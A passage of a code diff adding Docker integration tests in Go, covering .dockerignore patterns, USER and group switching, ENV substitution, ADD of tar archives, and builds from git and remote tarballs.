-c "! ls /tmp/Dockerfile" + RUN ls /tmp/.dockerignore` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": dockerfile, + ".dockerignore": "Dockerfile\n", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't ignore Dockerfile correctly:%s", err) + } + + // now try it with ./Dockerfile + ctx.Add(".dockerignore", "./Dockerfile\n") + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't ignore ./Dockerfile correctly:%s", err) + } + +} + +func (s *DockerSuite) TestBuildDockerignoringRenamedDockerfile(c *check.C) { + name := "testbuilddockerignoredockerfile" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN ls /tmp/Dockerfile + RUN sh -c "! ls /tmp/MyDockerfile" + RUN ls /tmp/.dockerignore` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": "Should not use me", + "MyDockerfile": dockerfile, + ".dockerignore": "MyDockerfile\n", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't ignore MyDockerfile correctly:%s", err) + } + + // now try it with ./MyDockerfile + ctx.Add(".dockerignore", "./MyDockerfile\n") + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't ignore ./MyDockerfile correctly:%s", err) + } + +} + +func (s *DockerSuite) TestBuildDockerignoringDockerignore(c *check.C) { + name := "testbuilddockerignoredockerignore" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN sh -c "! ls /tmp/.dockerignore" + RUN ls /tmp/Dockerfile` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": dockerfile, + ".dockerignore": ".dockerignore\n", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't ignore .dockerignore correctly:%s", err) + } +} + +func (s *DockerSuite) TestBuildDockerignoreTouchDockerfile(c *check.C) { + var id1 string + var id2 string + + name := "testbuilddockerignoretouchdockerfile" + dockerfile := ` + FROM busybox + ADD . /tmp/` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": dockerfile, + ".dockerignore": "Dockerfile\n", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if id1, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't build it correctly:%s", err) + } + + if id2, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't build it correctly:%s", err) + } + if id1 != id2 { + c.Fatalf("Didn't use the cache - 1") + } + + // Now make sure touching Dockerfile doesn't invalidate the cache + if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { + c.Fatalf("Didn't add Dockerfile: %s", err) + } + if id2, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't build it correctly:%s", err) + } + if id1 != id2 { + c.Fatalf("Didn't use the cache - 2") + } + + // One more time but just 'touch' it instead of changing the content + if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { + c.Fatalf("Didn't add Dockerfile: %s", err) + } + if id2, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't build it correctly:%s", err) + } + if id1 != id2 { + c.Fatalf("Didn't use the cache - 3") + } + +} + +func (s *DockerSuite) TestBuildDockerignoringWholeDir(c *check.C) { + name := "testbuilddockerignorewholedir" + dockerfile := ` + FROM busybox + COPY . / + RUN sh -c "[[ ! -e /.gitignore ]]" + RUN sh -c "[[ -f /Makefile ]]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": "FROM scratch", + "Makefile": "all:", + ".gitignore": "", + ".dockerignore": ".*\n", + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + + c.Assert(ctx.Add(".dockerfile", "*"), check.IsNil) + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + + c.Assert(ctx.Add(".dockerfile", "."), check.IsNil) + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + + c.Assert(ctx.Add(".dockerfile", "?"), check.IsNil) + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildDockerignoringBadExclusion(c *check.C) { + name := "testbuilddockerignorebadexclusion" + dockerfile := ` + FROM busybox + COPY . / + RUN sh -c "[[ ! -e /.gitignore ]]" + RUN sh -c "[[ -f /Makefile ]]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": "FROM scratch", + "Makefile": "all:", + ".gitignore": "", + ".dockerignore": "!\n", + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + if _, err = buildImageFromContext(name, ctx, true); err == nil { + c.Fatalf("Build was supposed to fail but didn't") + } + + if err.Error() != "failed to build the image: Error checking context: 'Illegal exclusion pattern: !'.\n" { + c.Fatalf("Incorrect output, got:%q", err.Error()) + } +} + +func (s *DockerSuite) TestBuildDockerignoringWildTopDir(c *check.C) { + dockerfile := ` + FROM busybox + COPY . / + RUN sh -c "[[ ! -e /.dockerignore ]]" + RUN sh -c "[[ ! -e /Dockerfile ]]" + RUN sh -c "[[ ! -e /file1 ]]" + RUN sh -c "[[ ! -e /dir ]]"` + + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": "FROM scratch", + "file1": "", + "dir/dfile1": "", + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + + // All of these should result in ignoring all files + for _, variant := range []string{"**", "**/", "**/**", "*"} { + ctx.Add(".dockerignore", variant) + _, err = buildImageFromContext("noname", ctx, true) + c.Assert(err, check.IsNil, check.Commentf("variant: %s", variant)) + } +} + +func (s *DockerSuite) TestBuildDockerignoringWildDirs(c *check.C) { + dockerfile := ` + FROM busybox + COPY . / + #RUN sh -c "[[ -e /.dockerignore ]]" + RUN sh -c "[[ -e /Dockerfile ]] && \ + [[ ! -e /file0 ]] && \ + [[ ! -e /dir1/file0 ]] && \ + [[ ! -e /dir2/file0 ]] && \ + [[ ! -e /file1 ]] && \ + [[ ! -e /dir1/file1 ]] && \ + [[ ! -e /dir1/dir2/file1 ]] && \ + [[ ! -e /dir1/file2 ]] && \ + [[ -e /dir1/dir2/file2 ]] && \ + [[ ! -e /dir1/dir2/file4 ]] && \ + [[ ! -e /dir1/dir2/file5 ]] && \ + [[ ! -e /dir1/dir2/file6 ]] && \ + [[ ! -e /dir1/dir3/file7 ]] && \ + [[ ! -e /dir1/dir3/file8 ]] && \ + [[ -e /dir1/dir3 ]] && \ + [[ -e /dir1/dir4 ]] && \ + [[ ! -e 'dir1/dir5/fileAA' ]] && \ + [[ -e 'dir1/dir5/fileAB' ]] && \ + [[ -e 'dir1/dir5/fileB' ]]" # "." in pattern means nothing + + RUN echo all done!` + + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": "FROM scratch", + "file0": "", + "dir1/file0": "", + "dir1/dir2/file0": "", + + "file1": "", + "dir1/file1": "", + "dir1/dir2/file1": "", + + "dir1/file2": "", + "dir1/dir2/file2": "", // remains + + "dir1/dir2/file4": "", + "dir1/dir2/file5": "", + "dir1/dir2/file6": "", + "dir1/dir3/file7": "", + "dir1/dir3/file8": "", + "dir1/dir4/file9": "", + + "dir1/dir5/fileAA": "", + "dir1/dir5/fileAB": "", + "dir1/dir5/fileB": "", + + ".dockerignore": ` +**/file0 +**/*file1 +**/dir1/file2 +dir1/**/file4 +**/dir2/file5 +**/dir1/dir2/file6 +dir1/dir3/** +**/dir4/** +**/file?A +**/file\?B +**/dir5/file. +`, + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + + _, err = buildImageFromContext("noname", ctx, true) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestBuildLineBreak(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildlinebreak" + _, err := buildImage(name, + `FROM busybox +RUN sh -c 'echo root:testpass \ + > /tmp/passwd' +RUN mkdir -p /var/run/sshd +RUN sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]" +RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`, + true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildEOLInLine(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildeolinline" + _, err := buildImage(name, + `FROM busybox +RUN sh -c 'echo root:testpass > /tmp/passwd' +RUN echo "foo \n bar"; echo "baz" +RUN mkdir -p /var/run/sshd +RUN sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]" +RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`, + true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCommentsShebangs(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildcomments" + _, err := buildImage(name, + `FROM busybox +# This is an ordinary comment. +RUN { echo '#!/bin/sh'; echo 'echo hello world'; } > /hello.sh +RUN [ ! -x /hello.sh ] +# comment with line break \ +RUN chmod +x /hello.sh +RUN [ -x /hello.sh ] +RUN [ "$(cat /hello.sh)" = $'#!/bin/sh\necho hello world' ] +RUN [ "$(/hello.sh)" = "hello world" ]`, + true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildUsersAndGroups(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildusers" + _, err := buildImage(name, + `FROM busybox + +# Make sure our defaults work +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)" = '0:0/root:root' ] + +# TODO decide if "args.user = strconv.Itoa(syscall.Getuid())" is acceptable behavior for changeUser in sysvinit instead of "return nil" when "USER" isn't specified (so that we get the proper group list even if that is the empty list, even in the default case of not supplying an explicit USER to run as, which implies USER 0) +USER root +RUN [ "$(id -G):$(id -Gn)" = '0 10:root wheel' ] + +# Setup dockerio user and group +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd && \ + echo 'dockerio:x:1001:' >> /etc/group + +# Make sure we can switch to our user and all the information is exactly as we expect it to be +USER dockerio +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ] + +# Switch back to root and double check that worked exactly as we might expect it to +USER root +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '0:0/root:root/0 10:root wheel' ] && \ + # Add a "supplementary" group for our dockerio user + echo 'supplementary:x:1002:dockerio' >> /etc/group + +# ... and then go verify that we get it like we expect +USER dockerio +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001 1002:dockerio supplementary' ] +USER 1001 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001 1002:dockerio supplementary' ] + +# super test the new "user:group" syntax +USER dockerio:dockerio +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ] +USER 1001:dockerio +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ] +USER dockerio:1001 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ] +USER 1001:1001 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ] +USER dockerio:supplementary +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ] +USER dockerio:1002 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ] +USER 1001:supplementary +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ] +USER 1001:1002 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ] + +# make sure unknown uid/gid still works properly +USER 1042:1043 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1042:1043/1042:1043/1043:1043' ]`, + true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildEnvUsage(c *check.C) { + // /docker/world/hello is not owned by the correct user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + name := "testbuildenvusage" + dockerfile := `FROM busybox +ENV HOME /root +ENV PATH $HOME/bin:$PATH +ENV PATH /tmp:$PATH +RUN [ "$PATH" = "/tmp:$HOME/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ] +ENV FOO /foo/baz +ENV BAR /bar +ENV BAZ $BAR +ENV FOOPATH $PATH:$FOO +RUN [ "$BAR" = "$BAZ" ] +RUN [ "$FOOPATH" = "$PATH:/foo/baz" ] +ENV FROM hello/docker/world +ENV TO /docker/world/hello +ADD $FROM $TO +RUN [ "$(cat $TO)" = "hello" ] +ENV abc=def +ENV ghi=$abc +RUN [ "$ghi" = "def" ] +` + ctx, err := fakeContext(dockerfile, map[string]string{ + "hello/docker/world": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildEnvUsage2(c *check.C) { + // /docker/world/hello is not owned by the correct user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + name := "testbuildenvusage2" + dockerfile := `FROM busybox +ENV abc=def def="hello world" +RUN [ "$abc,$def" = "def,hello world" ] +ENV def=hello\ world v1=abc v2="hi there" v3='boogie nights' v4="with'quotes too" +RUN [ "$def,$v1,$v2,$v3,$v4" = "hello world,abc,hi there,boogie nights,with'quotes too" ] +ENV abc=zzz FROM=hello/docker/world +ENV abc=zzz TO=/docker/world/hello +ADD $FROM $TO +RUN [ "$abc,$(cat $TO)" = "zzz,hello" ] +ENV abc 'yyy' +RUN [ $abc = 'yyy' ] +ENV abc= +RUN [ "$abc" = "" ] + +# use grep to make sure if the builder substitutes \$foo by mistake +# we don't get a false positive +ENV abc=\$foo +RUN [ "$abc" = "\$foo" ] && (echo "$abc" | grep foo) +ENV abc \$foo +RUN [ "$abc" = "\$foo" ] && (echo "$abc" | grep foo) + +ENV abc=\'foo\' abc2=\"foo\" +RUN [ "$abc,$abc2" = "'foo',\"foo\"" ] +ENV abc "foo" +RUN [ "$abc" = "foo" ] +ENV abc 'foo' +RUN [ "$abc" = 'foo' ] +ENV abc \'foo\' +RUN [ "$abc" = "'foo'" ] +ENV abc \"foo\" +RUN [ "$abc" = '"foo"' ] + +ENV abc=ABC +RUN [ "$abc" = "ABC" ] +ENV def1=${abc:-DEF} def2=${ccc:-DEF} +ENV def3=${ccc:-${def2}xx} def4=${abc:+ALT} def5=${def2:+${abc}:} def6=${ccc:-\$abc:} def7=${ccc:-\${abc}:} +RUN [ "$def1,$def2,$def3,$def4,$def5,$def6,$def7" = 'ABC,DEF,DEFxx,ALT,ABC:,$abc:,${abc:}' ] +ENV mypath=${mypath:+$mypath:}/home +ENV mypath=${mypath:+$mypath:}/away +RUN [ "$mypath" = '/home:/away' ] + +ENV e1=bar +ENV e2=$e1 e3=$e11 e4=\$e1 e5=\$e11 +RUN [ "$e0,$e1,$e2,$e3,$e4,$e5" = ',bar,bar,,$e1,$e11' ] + +ENV ee1 bar +ENV ee2 $ee1 +ENV ee3 $ee11 +ENV ee4 \$ee1 +ENV ee5 \$ee11 +RUN [ "$ee1,$ee2,$ee3,$ee4,$ee5" = 'bar,bar,,$ee1,$ee11' ] + +ENV eee1="foo" eee2='foo' +ENV eee3 "foo" +ENV eee4 'foo' +RUN [ "$eee1,$eee2,$eee3,$eee4" = 'foo,foo,foo,foo' ] + +` + ctx, err := fakeContext(dockerfile, map[string]string{ + "hello/docker/world": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddScript(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildaddscript" + dockerfile := ` +FROM busybox +ADD test /test +RUN ["chmod","+x","/test"] +RUN ["/test"] +RUN [ "$(cat /testfile)" = 'test!' ]` + ctx, err := fakeContext(dockerfile, map[string]string{ + "test": "#!/bin/sh\necho 'test!' > /testfile", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddTar(c *check.C) { + // /test/foo is not owned by the correct user + testRequires(c, NotUserNamespace) + name := "testbuildaddtar" + + ctx := func() *FakeContext { + dockerfile := ` +FROM busybox +ADD test.tar / +RUN cat /test/foo | grep Hi +ADD test.tar /test.tar +RUN cat /test.tar/test/foo | grep Hi +ADD test.tar /unlikely-to-exist +RUN cat /unlikely-to-exist/test/foo | grep Hi +ADD test.tar /unlikely-to-exist-trailing-slash/ +RUN cat /unlikely-to-exist-trailing-slash/test/foo | grep Hi +RUN sh -c "mkdir /existing-directory" #sh -c is needed on Windows to use the correct mkdir +ADD test.tar /existing-directory +RUN cat /existing-directory/test/foo | grep Hi +ADD test.tar /existing-directory-trailing-slash/ +RUN cat /existing-directory-trailing-slash/test/foo | grep Hi` + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + testTar, err := os.Create(filepath.Join(tmpDir, "test.tar")) + if err != nil { + c.Fatalf("failed to create test.tar archive: %v", err) + } + defer testTar.Close() + + tw := tar.NewWriter(testTar) + + if err := tw.WriteHeader(&tar.Header{ + Name: "test/foo", + Size: 2, + }); err != nil { + c.Fatalf("failed to write tar file header: %v", err) + } + if _, err := tw.Write([]byte("Hi")); err != nil { + c.Fatalf("failed to write tar file content: %v", err) + } + if err := tw.Close(); err != nil { + c.Fatalf("failed to close tar archive: %v", err) + } + + if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { + c.Fatalf("failed to open destination dockerfile: %v", err) + } + return fakeContextFromDir(tmpDir) + }() + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("build failed to complete for TestBuildAddTar: %v", err) + } + +} + +func (s *DockerSuite) TestBuildAddBrokenTar(c *check.C) { + name := "testbuildaddbrokentar" + + ctx := func() *FakeContext { + dockerfile := ` +FROM busybox +ADD test.tar /` + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + testTar, err := os.Create(filepath.Join(tmpDir, "test.tar")) + if err != nil { + c.Fatalf("failed to create test.tar archive: %v", err) + } + defer testTar.Close() + + tw := tar.NewWriter(testTar) + + if err := tw.WriteHeader(&tar.Header{ + Name: "test/foo", + Size: 2, + }); err != nil { + c.Fatalf("failed to write tar file header: %v", err) + } + if _, err := tw.Write([]byte("Hi")); err != nil { + c.Fatalf("failed to write tar file content: %v", err) + } + if err := tw.Close(); err != nil { + c.Fatalf("failed to close tar archive: %v", err) + } + + // Corrupt the tar by removing one byte off the end + stat, err := testTar.Stat() + if err != nil { + c.Fatalf("failed to stat tar archive: %v", err) + } + if err := testTar.Truncate(stat.Size() - 1); err != nil { + c.Fatalf("failed to truncate tar archive: %v", err) + } + + if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { + c.Fatalf("failed to open destination dockerfile: %v", err) + } + return fakeContextFromDir(tmpDir) + }() + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err == nil { + c.Fatalf("build should have failed for TestBuildAddBrokenTar") + } +} + +func (s *DockerSuite) TestBuildAddNonTar(c *check.C) { + name := "testbuildaddnontar" + + // Should not try to extract test.tar + ctx, err := fakeContext(` + FROM busybox + ADD test.tar / + RUN test -f /test.tar`, + map[string]string{"test.tar": "not_a_tar_file"}) + + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("build failed for TestBuildAddNonTar") + } +} + +func (s *DockerSuite) TestBuildAddTarXz(c *check.C) { + // /test/foo is not owned by the correct user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + name := "testbuildaddtarxz" + + ctx := func() *FakeContext { + dockerfile := ` + FROM busybox + ADD test.tar.xz / + RUN cat /test/foo | grep Hi` + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + testTar, err := os.Create(filepath.Join(tmpDir, "test.tar")) + if err != nil { + c.Fatalf("failed to create test.tar archive: %v", err) + } + defer testTar.Close() + + tw := tar.NewWriter(testTar) + + if err := tw.WriteHeader(&tar.Header{ + Name: "test/foo", + Size: 2, + }); err != nil { + c.Fatalf("failed to write tar file header: %v", err) + } + if _, err := tw.Write([]byte("Hi")); err != nil { + c.Fatalf("failed to write tar file content: %v", err) + } + if err := tw.Close(); err != nil { + c.Fatalf("failed to close tar archive: %v", err) + } + + xzCompressCmd := exec.Command("xz", "-k", "test.tar") + xzCompressCmd.Dir = tmpDir + out, _, err := runCommandWithOutput(xzCompressCmd) + if err != nil { + c.Fatal(err, out) + } + + if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { + c.Fatalf("failed to open destination dockerfile: %v", err) + } + return fakeContextFromDir(tmpDir) + }() + + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err) + } + +} + +func (s *DockerSuite) TestBuildAddTarXzGz(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildaddtarxzgz" + + ctx := func() *FakeContext { + dockerfile := ` + FROM busybox + ADD test.tar.xz.gz / + RUN ls /test.tar.xz.gz` + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + testTar, err := os.Create(filepath.Join(tmpDir, "test.tar")) + if err != nil { + c.Fatalf("failed to create test.tar archive: %v", err) + } + defer testTar.Close() + + tw := tar.NewWriter(testTar) + + if err := tw.WriteHeader(&tar.Header{ + Name: "test/foo", + Size: 2, + }); err != nil { + c.Fatalf("failed to write tar file header: %v", err) + } + if _, err := tw.Write([]byte("Hi")); err != nil { + c.Fatalf("failed to write tar file content: %v", err) + } + if err := tw.Close(); err != nil { + c.Fatalf("failed to close tar archive: %v", err) + } + + xzCompressCmd := exec.Command("xz", "-k", "test.tar") + xzCompressCmd.Dir = tmpDir + out, _, err := runCommandWithOutput(xzCompressCmd) + if err != nil { + c.Fatal(err, out) + } + + gzipCompressCmd := exec.Command("gzip", "test.tar.xz") + gzipCompressCmd.Dir = tmpDir + out, _, err = runCommandWithOutput(gzipCompressCmd) + if err != nil { + c.Fatal(err, out) + } + + if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { + c.Fatalf("failed to open destination dockerfile: %v", err) + } + return fakeContextFromDir(tmpDir) + }() + + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err) + } + +} + +func (s *DockerSuite) TestBuildFromGit(c *check.C) { + name := "testbuildfromgit" + git, err := newFakeGit("repo", map[string]string{ + "Dockerfile": `FROM busybox + ADD first /first + RUN [ -f /first ] + MAINTAINER docker`, + "first": "test git data", + }, true) + if err != nil { + c.Fatal(err) + } + defer git.Close() + + _, err = buildImageFromPath(name, git.RepoURL, true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Author") + if res != "docker" { + c.Fatalf("Maintainer should be docker, got %s", res) + } +} + +func (s *DockerSuite) TestBuildFromGitWithContext(c *check.C) { + name := "testbuildfromgit" + git, err := newFakeGit("repo", map[string]string{ + "docker/Dockerfile": `FROM busybox + ADD first /first + RUN [ -f /first ] + MAINTAINER docker`, + "docker/first": "test git data", + }, true) + if err != nil { + c.Fatal(err) + } + defer git.Close() + + u := fmt.Sprintf("%s#master:docker", git.RepoURL) + _, err = buildImageFromPath(name, u, true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Author") + if res != "docker" { + c.Fatalf("Maintainer should be docker, got %s", res) + } +} + +func (s *DockerSuite) TestBuildFromGitwithF(c *check.C) { + name := "testbuildfromgitwithf" + git, err := newFakeGit("repo", map[string]string{ + "myApp/myDockerfile": `FROM busybox + RUN echo hi from Dockerfile`, + }, true) + if err != nil { + c.Fatal(err) + } + defer git.Close() + + out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "myApp/myDockerfile", git.RepoURL) + if err != nil { + c.Fatalf("Error on build. Out: %s\nErr: %v", out, err) + } + + if !strings.Contains(out, "hi from Dockerfile") { + c.Fatalf("Missing expected output, got:\n%s", out) + } +} + +func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) { + name := "testbuildfromremotetarball" + + buffer := new(bytes.Buffer) + tw := tar.NewWriter(buffer) + defer tw.Close() + + dockerfile := []byte(`FROM busybox + MAINTAINER docker`) + if err := tw.WriteHeader(&tar.Header{ + Name: "Dockerfile", + Size: int64(len(dockerfile)), + }); err != nil { + c.Fatalf("failed to write tar file header: %v", err) + } + if _, err := tw.Write(dockerfile); err != nil { + c.Fatalf("failed to write tar file content: %v", err) + } + if err := tw.Close(); err != nil { + c.Fatalf("failed to close tar archive: %v", err) + } + + server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + "testT.tar": buffer, + }) + c.Assert(err, check.IsNil) + + defer server.Close() + + _, err = buildImageFromPath(name, server.URL()+"/testT.tar", true) + c.Assert(err, check.IsNil) + + res := inspectField(c, name, "Author") + + if res != "docker" { + c.Fatalf("Maintainer should be docker, got %s", res) + } +} + +func (s *DockerSuite) TestBuildCleanupCmdOnEntrypoint(c *check.C) { + name := "testbuildcmdcleanuponentrypoint" + if _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + CMD ["test"] + ENTRYPOINT ["echo"]`, + true); err != nil { + c.Fatal(err) + } + if _, err := buildImage(name, + fmt.Sprintf(`FROM %s + ENTRYPOINT ["cat"]`, name), + true); err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Cmd") + if res != "[]" { + c.Fatalf("Cmd %s, expected nil", res) + } + + res = inspectField(c, name, "Config.Entrypoint") + if expected := "[cat]"; res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildClearCmd(c *check.C) { + name := "testbuildclearcmd" + _, err := buildImage(name, + `From `+minimalBaseImage()+` + ENTRYPOINT ["/bin/bash"] + CMD []`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.Cmd") + if res != "[]" { + c.Fatalf("Cmd %s, expected %s", res, "[]") + } +} + +func (s *DockerSuite) TestBuildEmptyCmd(c *check.C) { + // Skip on Windows. Base image on Windows has a CMD set in the image. + testRequires(c, DaemonIsLinux) + + name := "testbuildemptycmd" + if _, err := buildImage(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true); err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.Cmd") + if res != "null" { + c.Fatalf("Cmd %s, expected %s", res, "null") + } +} + +func (s *DockerSuite) TestBuildOnBuildOutput(c *check.C) { + name := "testbuildonbuildparent" + if _, err := buildImage(name, "FROM busybox\nONBUILD RUN echo foo\n", true); err != nil { + c.Fatal(err) + } + + _, out, err := buildImageWithOut(name, "FROM "+name+"\nMAINTAINER quux\n", true) + if err != nil { + c.Fatal(err) + } + + if !strings.Contains(out, "# Executing 1 build trigger") { + c.Fatal("failed to find the build trigger output", out) + } +} + +func (s *DockerSuite) TestBuildInvalidTag(c *check.C) { + name := "abcd:" + stringutils.GenerateRandomAlphaOnlyString(200) + _, out, err := buildImageWithOut(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true) + // if the error doesn't check for illegal tag name, or the image is built + // then this should fail + if !strings.Contains(out, "Error parsing reference") || strings.Contains(out, "Sending build context to Docker daemon") { + c.Fatalf("failed to stop before building. Error: %s, Output: %s", err, out) + } +} + +func (s *DockerSuite) TestBuildCmdShDashC(c *check.C) { + name := "testbuildcmdshc" + if _, err := buildImage(name, "FROM busybox\nCMD echo cmd\n", true); err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.Cmd") + + expected := `["/bin/sh","-c","echo cmd"]` + if daemonPlatform == "windows" { + expected = `["cmd","/S","/C","echo cmd"]` + } + + if res != expected { + c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res) + } + +} + +func (s *DockerSuite) TestBuildCmdSpaces(c *check.C) { + // Test to make sure that when we strcat arrays we take into account + // the arg separator to make sure ["echo","hi"] and ["echo hi"] don't + // look the same + name := "testbuildcmdspaces" + var id1 string + var id2 string + var err error + + if id1, err = buildImage(name, "FROM busybox\nCMD [\"echo hi\"]\n", true); err != nil { + c.Fatal(err) + } + + if id2, err = buildImage(name, "FROM busybox\nCMD [\"echo\", \"hi\"]\n", true); err != nil { + c.Fatal(err) + } + + if id1 == id2 { + c.Fatal("Should not have resulted in the same CMD") + } + + // Now do the same with 